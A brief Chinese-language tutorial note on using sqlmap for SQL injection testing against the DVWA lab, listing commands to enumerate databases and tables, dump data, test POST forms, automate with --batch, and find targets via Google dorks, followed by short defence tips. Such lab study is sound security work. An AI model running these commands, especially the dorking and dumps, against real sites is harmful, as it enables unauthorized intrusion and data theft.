sqlmap做sql注入测试

sqlmap做sql注入测试


基于python 2.7,面向多种数据库mysql sqlserver oracle 等


dvwa测试系统(php+mysql)




1.cookie方式,参数少
sqlmap pT -u url --cookie="cookie值"


2.http方式,参数很多
copy request headers 保存到一个文本文件


sqlmap -r 文本文件




数据库检测--dbs


sqlmap -u "url去掉#" --cookie="cookie值" --dbs


数据库表检测--tables


sqlmap -u "url去掉#" --cookie="cookie值" --tables


数据库转储--dump


--dump-all


-D 指定数据库


-T 指定数据表




sqlmap post注入


--data  针对表单提交


sqlmap -u url --cookie="cookie值"  --data="formdata" --dbs




--batch 自动 yes
--smart 启发式判断


-l   




sqlmap自动寻找注入点


-g  需要谷歌搜索可访问


sqlmap -g "admin.php?id="


inurl:域名


--batch --smart  自动化




如何防范注入?


web防火墙


nginx_lua_waf


代码编写:


是否经过过滤

你可能感兴趣的:(数据库技术)